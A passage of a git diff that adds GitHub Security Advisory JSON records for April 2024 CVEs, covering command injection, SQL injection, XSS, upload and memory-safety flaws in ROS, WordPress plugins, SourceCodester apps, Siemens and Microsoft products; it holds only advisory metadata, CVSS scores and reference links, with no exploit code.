"2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-30729" + ], + "details": "An OS command injection vulnerability has been discovered in ROS Kinetic Kame in ROS_VERSION 1 and ROS_ PYTHON_VERSION 3, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via the External Command Execution Modules, System Call Handlers, and Interface Scripts.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30729" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30729" + }, + { + "type": "WEB", + "url": "http://ros.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m289-xpfv-pfp5/GHSA-m289-xpfv-pfp5.json b/advisories/unreviewed/2024/04/GHSA-m289-xpfv-pfp5/GHSA-m289-xpfv-pfp5.json new file mode 100644 index 00000000000..9b12761a3a0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m289-xpfv-pfp5/GHSA-m289-xpfv-pfp5.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m289-xpfv-pfp5", + "modified": "2024-04-08T00:30:46Z", + "published": "2024-04-08T00:30:46Z", + "aliases": [ + "CVE-2024-3437" + ], + "details": "A vulnerability was found in SourceCodester Prison Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /Admin/add-admin.php of the component Avatar Handler. The manipulation of the argument avatar leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259631.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3437" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/PrisonManagementSystemRCE2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259631" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259631" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311920" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T00:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m32q-g43c-p863/GHSA-m32q-g43c-p863.json b/advisories/unreviewed/2024/04/GHSA-m32q-g43c-p863/GHSA-m32q-g43c-p863.json new file mode 100644 index 00000000000..816bc72bc12 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m32q-g43c-p863/GHSA-m32q-g43c-p863.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m32q-g43c-p863", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2023-50821" + ], + "details": "A vulnerability has been identified in SIMATIC PCS 7 V9.1 (All versions < V9.1 SP2 UC04), SIMATIC WinCC Runtime Professional V17 (All versions), SIMATIC WinCC Runtime Professional V18 (All versions), SIMATIC WinCC Runtime Professional V19 (All versions < V19 Update 1), SIMATIC WinCC V7.5 (All versions < V7.5 SP2 Update 16), SIMATIC WinCC V8.0 (All versions). The affected products do not properly validate the input provided in the login dialog box. An attacker could leverage this vulnerability to cause a persistent denial of service condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50821" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-730482.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m3pg-c9mv-657r/GHSA-m3pg-c9mv-657r.json b/advisories/unreviewed/2024/04/GHSA-m3pg-c9mv-657r/GHSA-m3pg-c9mv-657r.json new file mode 100644 index 00000000000..aca9de75e0b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m3pg-c9mv-657r/GHSA-m3pg-c9mv-657r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m3pg-c9mv-657r", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26229" + ], + "details": "Windows CSC Service Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26229" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26229" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m52g-q6h9-ggm5/GHSA-m52g-q6h9-ggm5.json b/advisories/unreviewed/2024/04/GHSA-m52g-q6h9-ggm5/GHSA-m52g-q6h9-ggm5.json new file mode 100644 index 00000000000..6a5250aa0b4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m52g-q6h9-ggm5/GHSA-m52g-q6h9-ggm5.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m52g-q6h9-ggm5", + "modified": "2024-04-08T21:31:16Z", + "published": "2024-04-08T21:31:16Z", + "aliases": [ + "CVE-2024-3463" + ], + "details": "A vulnerability has been found in SourceCodester Laundry Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /karyawan/edit. The manipulation of the argument karyawan leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259744.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3463" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/LaundryManagementSystemXSS.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259744" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259744" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312302" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m52h-743p-4255/GHSA-m52h-743p-4255.json b/advisories/unreviewed/2024/04/GHSA-m52h-743p-4255/GHSA-m52h-743p-4255.json new file mode 100644 index 00000000000..63ef5fc7347 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m52h-743p-4255/GHSA-m52h-743p-4255.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m52h-743p-4255", + "modified": "2024-04-05T21:32:42Z", + "published": "2024-04-05T21:32:42Z", + "aliases": [ + "CVE-2024-3352" + ], + "details": "A vulnerability has been found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/mod_comments/index.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259456.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3352" + }, + { + "type": "WEB", + "url": "https://github.com/qqqyc/vlun1/blob/main/Aplaya-Beach-Resort-Online-Reservation-System-05" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259456" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259456" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310220" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T19:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m5gq-xfj3-7366/GHSA-m5gq-xfj3-7366.json b/advisories/unreviewed/2024/04/GHSA-m5gq-xfj3-7366/GHSA-m5gq-xfj3-7366.json new file mode 100644 index 00000000000..f13de5c70fb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m5gq-xfj3-7366/GHSA-m5gq-xfj3-7366.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m5gq-xfj3-7366", + "modified": "2024-04-09T00:30:41Z", + "published": "2024-04-09T00:30:41Z", + "aliases": [ + "CVE-2024-23079" + ], + "details": "JGraphT Core v1.5.2 was discovered to contain a NullPointerException via the component org.jgrapht.alg.util.ToleranceDoubleComparator::compare(Double, Double).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23079" + }, + { + "type": "WEB", + "url": "https://gist.github.com/LLM4IG/c19779800945cd0a400d2150fb83d079" + }, + { + "type": "WEB", + "url": "https://github.com/jgrapht/jgrapht" + }, + { + "type": "WEB", + "url": "http://jgrapht.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T23:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m5v4-f2gf-v6x5/GHSA-m5v4-f2gf-v6x5.json b/advisories/unreviewed/2024/04/GHSA-m5v4-f2gf-v6x5/GHSA-m5v4-f2gf-v6x5.json new file mode 100644 index 00000000000..6f08edda448 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m5v4-f2gf-v6x5/GHSA-m5v4-f2gf-v6x5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m5v4-f2gf-v6x5", + "modified": "2024-04-09T15:30:36Z", + "published": "2024-04-09T15:30:36Z", + "aliases": [ + "CVE-2023-6318" + ], + "details": "A command injection vulnerability exists in the processAnalyticsReport method from the com.webos.service.cloudupload service on webOS version 5 through 7. A series of specially crafted requests can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability.\n\nFull versions and TV models affected:\n\n * webOS 5.5.0 - 04.50.51 running on OLED55CXPUA \n\n * webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB \n\n * webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6318" + }, + { + "type": "WEB", + "url": "https://bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m6gg-639w-rh6m/GHSA-m6gg-639w-rh6m.json b/advisories/unreviewed/2024/04/GHSA-m6gg-639w-rh6m/GHSA-m6gg-639w-rh6m.json new file mode 100644 index 00000000000..7c1d1754016 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m6gg-639w-rh6m/GHSA-m6gg-639w-rh6m.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m6gg-639w-rh6m", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2788" + ], + "details": "The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post Title HTML Tag in all versions up to, and including, 3.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2788" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3064385%40happy-elementor-addons%2Ftrunk&old=3044937%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=#file13" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/73e4ec2f-f4e1-469d-a4b7-5a10d44b7a2f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m7f8-xj6j-5x9x/GHSA-m7f8-xj6j-5x9x.json b/advisories/unreviewed/2024/04/GHSA-m7f8-xj6j-5x9x/GHSA-m7f8-xj6j-5x9x.json new file mode 100644 index 00000000000..25a8fe4b0f9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m7f8-xj6j-5x9x/GHSA-m7f8-xj6j-5x9x.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m7f8-xj6j-5x9x", + "modified": "2024-04-08T03:30:53Z", + "published": "2024-04-08T03:30:53Z", + "aliases": [ + "CVE-2023-52536" + ], + "details": "In faceid service, there is a possible out of bounds read due to a missing bounds check. This could lead to local denial of service with System execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52536" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777148475750809602" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m83g-jj6q-34wp/GHSA-m83g-jj6q-34wp.json b/advisories/unreviewed/2024/04/GHSA-m83g-jj6q-34wp/GHSA-m83g-jj6q-34wp.json new file mode 100644 index 00000000000..438c41f2730 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m83g-jj6q-34wp/GHSA-m83g-jj6q-34wp.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m83g-jj6q-34wp", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2081" + ], + "details": "The Best WordPress Gallery Plugin – FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the foogallery_attachment_modal_save action in all versions up to, and including, 2.4.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2081" + }, + { + "type": "WEB", + "url": "https://github.com/fooplugins/foogallery" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3057349%40foogallery&old=3039397%40foogallery&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2edeb63-56ad-45e7-9e85-cdf0a8ef41e7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m87m-mh9g-fvv5/GHSA-m87m-mh9g-fvv5.json b/advisories/unreviewed/2024/04/GHSA-m87m-mh9g-fvv5/GHSA-m87m-mh9g-fvv5.json new file mode 100644 index 00000000000..1eb4b26ece3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m87m-mh9g-fvv5/GHSA-m87m-mh9g-fvv5.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m87m-mh9g-fvv5", + "modified": "2024-04-09T06:30:44Z", + "published": "2024-04-09T06:30:44Z", + "aliases": [ + "CVE-2024-30681" + ], + "details": "An OS command injection vulnerability has been discovered in ROS2 Iron Irwini version ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via the command processing or system call components in ROS2.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30681" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30681" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T04:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m8hx-m8xm-2r63/GHSA-m8hx-m8xm-2r63.json b/advisories/unreviewed/2024/04/GHSA-m8hx-m8xm-2r63/GHSA-m8hx-m8xm-2r63.json new file mode 100644 index 00000000000..3def0b43e73 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m8hx-m8xm-2r63/GHSA-m8hx-m8xm-2r63.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m8hx-m8xm-2r63", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3213" + ], + "details": "The Relevanssi – A Better Search plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the relevanssi_update_counts() function in all versions up to, and including, 4.22.1. This makes it possible for unauthenticated attackers to execute expensive queries on the application that could lead into DOS.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3213" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/relevanssi/trunk/lib/admin-ajax.php#L443" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064304/relevanssi/tags/4.22.2/lib/admin-ajax.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e625130f-8e21-4baf-9d3c-4cbb806b9e52?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m9f8-h39r-m8r2/GHSA-m9f8-h39r-m8r2.json b/advisories/unreviewed/2024/04/GHSA-m9f8-h39r-m8r2/GHSA-m9f8-h39r-m8r2.json new file mode 100644 index 00000000000..398a0c5e327 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m9f8-h39r-m8r2/GHSA-m9f8-h39r-m8r2.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m9f8-h39r-m8r2", + "modified": "2024-04-09T09:31:10Z", + "published": "2024-04-09T09:31:10Z", + "aliases": [ + "CVE-2024-30691" + ], + "details": "An issue was discovered in ROS2 Galactic Geochelone in version ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code, escalate privileges, obtain sensitive information, and gain unauthorized access to multiple ROS2 nodes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30691" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30691" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-m9v7-qqvg-7f89/GHSA-m9v7-qqvg-7f89.json b/advisories/unreviewed/2024/04/GHSA-m9v7-qqvg-7f89/GHSA-m9v7-qqvg-7f89.json new file mode 100644 index 00000000000..b2709395e79 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-m9v7-qqvg-7f89/GHSA-m9v7-qqvg-7f89.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m9v7-qqvg-7f89", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52544" + ], + "details": "Vulnerability of file path verification being bypassed in the email module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52544" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mcv4-77gg-xfvp/GHSA-mcv4-77gg-xfvp.json b/advisories/unreviewed/2024/04/GHSA-mcv4-77gg-xfvp/GHSA-mcv4-77gg-xfvp.json new file mode 100644 index 00000000000..de2bcc079a3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mcv4-77gg-xfvp/GHSA-mcv4-77gg-xfvp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mcv4-77gg-xfvp", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28931" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28931" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28931" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mg9j-5xr7-3245/GHSA-mg9j-5xr7-3245.json b/advisories/unreviewed/2024/04/GHSA-mg9j-5xr7-3245/GHSA-mg9j-5xr7-3245.json new file mode 100644 index 00000000000..f2336bb9076 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mg9j-5xr7-3245/GHSA-mg9j-5xr7-3245.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg9j-5xr7-3245", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2342" + ], + "details": "The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the customer_id parameter in all versions up to, and including, 1.6.7.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2342" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3054815%40simply-schedule-appointments%2Ftrunk&old=3054636%40simply-schedule-appointments%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0c0dd466-a78a-4b79-b9bd-5363f69d9a4c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mg9w-gjgf-qggr/GHSA-mg9w-gjgf-qggr.json b/advisories/unreviewed/2024/04/GHSA-mg9w-gjgf-qggr/GHSA-mg9w-gjgf-qggr.json new file mode 100644 index 00000000000..e9b9a87fe35 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mg9w-gjgf-qggr/GHSA-mg9w-gjgf-qggr.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg9w-gjgf-qggr", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29753" + ], + "details": "In tmu_set_control_temp_step of tmu.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29753" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mggj-wcpg-x6cm/GHSA-mggj-wcpg-x6cm.json b/advisories/unreviewed/2024/04/GHSA-mggj-wcpg-x6cm/GHSA-mggj-wcpg-x6cm.json new file mode 100644 index 00000000000..f2d041dcf74 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mggj-wcpg-x6cm/GHSA-mggj-wcpg-x6cm.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mggj-wcpg-x6cm", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52348" + ], + "details": "In ril service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52348" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-mghh-4m9h-vqxx/GHSA-mghh-4m9h-vqxx.json b/advisories/unreviewed/2024/04/GHSA-mghh-4m9h-vqxx/GHSA-mghh-4m9h-vqxx.json new file mode 100644 index 00000000000..3c2d9172f2e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-mghh-4m9h-vqxx/GHSA-mghh-4m9h-vqxx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mghh-4m9h-vqxx", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28910" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28910" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28910" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": 